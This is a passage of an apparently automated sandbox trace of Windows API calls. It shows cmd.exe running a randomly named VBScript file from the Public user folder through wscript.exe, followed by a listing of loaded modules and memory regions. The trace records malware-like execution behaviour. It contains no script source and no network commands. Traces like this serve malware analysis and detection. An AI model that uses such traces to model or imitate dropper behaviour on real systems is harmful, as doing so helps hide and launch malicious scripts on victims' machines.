GetFileAttributesW (lpFileName="C:\\Windows\\system32") returned 0x10 [0221.804] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1bf9b4 | out: lpFindFileData=0x1bf9b4) returned 0x3207f0 [0221.804] FindClose (in: hFindFile=0x3207f0 | out: hFindFile=0x3207f0) returned 1 [0221.805] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1bf9b4 | out: lpFindFileData=0x1bf9b4) returned 0x3207f0 [0221.805] FindClose (in: hFindFile=0x3207f0 | out: hFindFile=0x3207f0) returned 1 [0221.805] GetFileAttributesW (lpFileName="C:\\Windows\\System32") returned 0x10 [0221.805] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0221.805] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0221.805] GetEnvironmentStringsW () returned 0x330468 [0221.805] FreeEnvironmentStringsW (penv=0x330468) returned 1 [0221.805] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0221.808] GetConsoleOutputCP () returned 0x1b5 [0221.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0221.808] GetUserDefaultLCID () returned 0x409 [0221.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a834950, cchData=8 | out: lpLCData=":") returned 2 [0221.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1bfd78, cchData=128 | out: lpLCData="0") returned 2 [0221.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1bfd78, cchData=128 | out: lpLCData="0") returned 2 [0221.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1bfd78, cchData=128 | out: lpLCData="1") returned 2 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a834940, cchData=8 | out: lpLCData="/") returned 2 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a834d80, cchData=32 | out: lpLCData="Mon") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a834d40, cchData=32 | out: lpLCData="Tue") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a834d00, cchData=32 | out: lpLCData="Wed") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a834cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a834c80, cchData=32 | out: lpLCData="Fri") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a834c40, cchData=32 | out: lpLCData="Sat") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a834c00, cchData=32 | out: lpLCData="Sun") returned 4 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a834930, cchData=8 | out: lpLCData=".") returned 2 [0221.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a834920, cchData=8 | out: lpLCData=",") returned 2 [0221.809] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0221.810] GetConsoleTitleW (in: lpConsoleTitle=0x3327d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.811] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.811] GetFileType (hFile=0x7) returned 0x2 [0221.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.811] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1bfe74 | out: lpMode=0x1bfe74) returned 1 [0221.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1bfe90 | out: lpConsoleScreenBufferInfo=0x1bfe90) returned 1 [0221.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1bfe5c | out: lpConsoleScreenBufferInfo=0x1bfe5c) returned 1 [0221.812] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1bfe74 | out: lpNumberOfAttrsWritten=0x1bfe74) returned 1 [0221.812] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0221.812] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0221.812] GetProcAddress (hModule=0x75900000, lpProcName="CopyFileExW") returned 0x7593ac6c [0221.812] GetProcAddress (hModule=0x75900000, lpProcName="IsDebuggerPresent") returned 0x75943ea8 [0221.812] GetProcAddress (hModule=0x75900000, lpProcName="SetConsoleInputExeNameW") returned 0x75952732 [0221.815] _wcsicmp (_String1="C:\\Users\\Public\\N3Eg\\N3E.vbs", _String2=")") returned 58 [0221.815] _wcsicmp (_String1="FOR", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 3 [0221.815] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 3 [0221.815] _wcsicmp (_String1="IF", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 6 [0221.815] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 6 [0221.816] _wcsicmp (_String1="REM", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 15 [0221.816] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 15 [0221.817] GetConsoleTitleW (in: lpConsoleTitle=0x1bfa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0221.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0221.817] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1bf82c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1bf824, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1bf824*=0x4029d17b, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0221.818] _wcsnicmp (_String1="C:\\Users\\Public\\N3Eg\\N3E.vbs", _String2="cmd ", _MaxCount=0x4) returned -51 [0221.818] SetErrorMode (uMode=0x0) returned 0x1 [0221.818] SetErrorMode (uMode=0x1) returned 0x0 [0221.818] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg\\.", nBufferLength=0x208, lpBuffer=0x3207f8, lpFilePart=0x1bf590 | out: lpBuffer="C:\\Users\\Public\\N3Eg", lpFilePart=0x1bf590*="N3Eg") returned 0x14 [0221.818] SetErrorMode (uMode=0x1) returned 0x1 [0221.819] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\Public\\N3Eg\\.") returned 1 [0221.819] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0221.824] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs", fInfoLevelId=0x1, lpFindFileData=0x1bf32c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf32c) returned 0x332e00 [0221.825] FindClose (in: hFindFile=0x332e00 | out: hFindFile=0x332e00) returned 1 [0221.825] _wcsicmp (_String1=".vbs", _String2=".CMD") returned 19 [0221.825] _wcsicmp (_String1=".vbs", _String2=".BAT") returned 20 [0221.825] GetConsoleTitleW (in: lpConsoleTitle=0x1bf804, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.825] GetConsoleTitleW (in: lpConsoleTitle=0x332e68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.826] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 1 [0221.826] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf68c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf754 | out: lpAttributeList=0x1bf68c, lpSize=0x1bf754) returned 1 [0221.826] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf68c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bf74c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf68c, lpPreviousValue=0x0) returned 1 [0221.826] GetStartupInfoW (in: lpStartupInfo=0x1bf648 | out: lpStartupInfo=0x1bf648*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x80, hStdOutput=0x332e58, hStdError=0x1bf778)) [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\Windows\\System32", _MaxCount=0x7) returned 38 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSERSPROFILE=C:\\ProgramData", _MaxCount=0x7) returned 2 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA=C:\\Users\\DSsDPMx042\\AppData\\Roaming", _MaxCount=0x7) returned 2 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="CommonProgramFiles=C:\\Program Files\\Common Files", _MaxCount=0x7) returned 3 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTERNAME=N3EERVTWSM", _MaxCount=0x7) returned 3 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec=C:\\Windows\\system32\\cmd.exe", _MaxCount=0x7) returned 3 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_HOST_CHECK=NO", _MaxCount=0x7) returned -3 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRIVE=C:", _MaxCount=0x7) returned -5 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPATH=\\Users\\DSsDPMx042", _MaxCount=0x7) returned -5 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAPPDATA=C:\\Users\\DSsDPMx042\\AppData\\Local", _MaxCount=0x7) returned -9 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSERVER=\\\\N3EERVTWSM", _MaxCount=0x7) returned -9 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_OF_PROCESSORS=1", _MaxCount=0x7) returned -11 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="OS=Windows_NT", _MaxCount=0x7) returned -12 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_ARCHITECTURE=x86", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_IDENTIFIER=x86 Family 6 Model 45 Stepping 7, GenuineIntel", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_LEVEL=6", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_REVISION=2d07", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="ProgramData=C:\\ProgramData", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="ProgramFiles=C:\\Program Files", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=$P$G", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=C:\\Users\\Public", _MaxCount=0x7) returned -13 [0221.827] _wcsnicmp (_String1="COPYCMD", _String2="SESSIONNAME=Console", _MaxCount=0x7) returned -16 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemDrive=C:", _MaxCount=0x7) returned -16 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemRoot=C:\\Windows", _MaxCount=0x7) returned -16 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp", _MaxCount=0x7) returned -17 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp", _MaxCount=0x7) returned -17 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="USERDOMAIN=N3EERVTWSM", _MaxCount=0x7) returned -18 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="USERNAME=DSsDPMx042", _MaxCount=0x7) returned -18 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="USERPROFILE=C:\\Users\\DSsDPMx042", _MaxCount=0x7) returned -18 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="windir=C:\\Windows", _MaxCount=0x7) returned -20 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="windows_tracing_flags=3", _MaxCount=0x7) returned -20 [0221.828] _wcsnicmp (_String1="COPYCMD", _String2="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", _MaxCount=0x7) returned -20 [0221.828] lstrcmpW (lpString1="\\N3E.vbs", lpString2="\\XCOPY.EXE") returned -1 [0221.829] CreateProcessW (in: lpApplicationName="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpCommandLine="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1bf6e8*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\Public\\N3Eg\\N3E.vbs", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf734 | out: lpCommandLine="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpProcessInformation=0x1bf734*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0221.833] GetLastError () returned 0xc1 [0221.833] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0221.833] GetEnvironmentStringsW () returned 0x331df8 [0221.833] FreeEnvironmentStringsW (penv=0x331df8) returned 1 [0221.833] GetConsoleWindow () returned 0x60104 [0221.833] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759e0000 [0221.841] GetProcAddress (hModule=0x759e0000, lpProcName="ShellExecuteExW") returned 0x75a01e46 [0221.841] ShellExecuteExW (in: pExecInfo=0x1bf6ac*(cbSize=0x3c, fMask=0x8140, hwnd=0x60104, lpVerb=0x0, lpFile="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpParameters=0x0, lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x1bf6ac*(cbSize=0x3c, fMask=0x8140, hwnd=0x60104, lpVerb=0x0, lpFile="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpParameters=0x0, lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x200)) returned 1 [0222.309] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) Thread: id = 82 os_tid = 0xf18 Thread: id = 83 os_tid = 0xf1c Thread: id = 84 os_tid = 0xf20 Thread: id = 85 os_tid = 0xf24 Process: id = "6" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0x7f09e440" os_pid = "0xf28" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xef8" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\Public\\N3Eg\\N3E.vbs\" " cur_dir = "C:\\Windows\\system32\\" Region: id = 930 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 931 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 932 start_va = 0x80000 end_va = 0xa5fff entry_point = 0x82f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" Region: id = 933 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 934 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 935 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 936 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 937 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 938 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 939 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 940 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 941 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 942 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 943 start_va = 0x748a0000 end_va = 0x748a8fff entry_point = 0x748a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 944 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 945 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 946 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 947 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 948 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 949 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 950 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 951 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 952 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 953 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 954 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 955 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 956 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 957 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 958 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 959 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 960 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 961 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 962 start_va = 0x50000 end_va = 0x52fff entry_point = 0x50000 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\System32\\en-US\\wscript.exe.mui" Region: id = 963 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 964 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 965 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 966 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 967 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 968 start_va = 0x1200000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 969 start_va = 0x74090000 end_va = 0x740cffff entry_point = 0x7409a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 970 start_va = 0x1240000 end_va = 0x131efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 971 start_va = 0x1500000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 972 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 973 start_va = 0x320000 end_va = 0x32efff entry_point = 0x322f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" Region: id = 974 start_va = 0x1600000 end_va = 0x18cefff entry_point = 0x1600000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 975 start_va = 0x752b0000 end_va = 0x7530efff entry_point = 0x752b2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" Region: id = 976 start_va = 0x1920000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 977 start_va = 0x73da0000 end_va = 0x73db2fff entry_point = 0x73da1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 978 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 979 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 980 start_va = 0x76e20000 end_va = 0x76ea2fff entry_point = 0x76e223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 981 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 982 start_va = 0x6c4c0000 end_va = 0x6c52afff entry_point = 0x6c4c1409 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\System32\\vbscript.dll" Region: id = 983 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 984 start_va = 0x753d0000 end_va = 0x754ecfff entry_point = 0x753d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 985 start_va = 0x75560000 end_va = 0x7558cfff entry_point = 0x7556296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 986 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 987 start_va = 0x74bc0000 end_va = 0x74bfafff entry_point = 0x74bc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 988 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 989 start_va = 0x1a60000 end_va = 0x1b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 990 start_va = 0x6dd30000 end_va = 0x6dd37fff entry_point = 0x6dd33bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" Region: id = 991 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 992 start_va = 0x1400000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 993 start_va = 0x1b60000 end_va = 0x1f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 994 start_va = 0x6c1c0000 end_va = 0x6c243fff entry_point = 0x6c1c19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" Region: id = 995 start_va = 0x6db10000 end_va = 0x6db25fff entry_point = 0x6db113df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" Region: id = 996 start_va = 0x759e0000 end_va = 0x76629fff entry_point = 0x75a61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 997 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 998 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 999 start_va = 0x2050000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1000 start_va = 0x6dae0000 end_va = 0x6db0cfff entry_point = 0x6dae1351 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" Region: id = 1001 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1002 start_va = 0x2060000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1003 start_va = 0x6dab0000 end_va = 0x6dad9fff entry_point = 0x6dab13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" Region: id = 